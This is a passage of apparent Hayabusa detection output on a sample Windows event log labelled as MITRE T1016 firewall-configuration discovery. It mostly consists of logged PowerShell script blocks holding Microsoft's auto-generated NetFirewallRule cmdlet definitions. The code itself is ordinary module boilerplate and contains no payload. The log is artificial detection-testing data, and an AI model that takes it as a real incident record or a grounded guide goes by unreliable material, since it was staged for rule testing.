if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetFirewallRule' function Copy-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdle",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.582 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"t.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetFirewallRule' function Enable-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 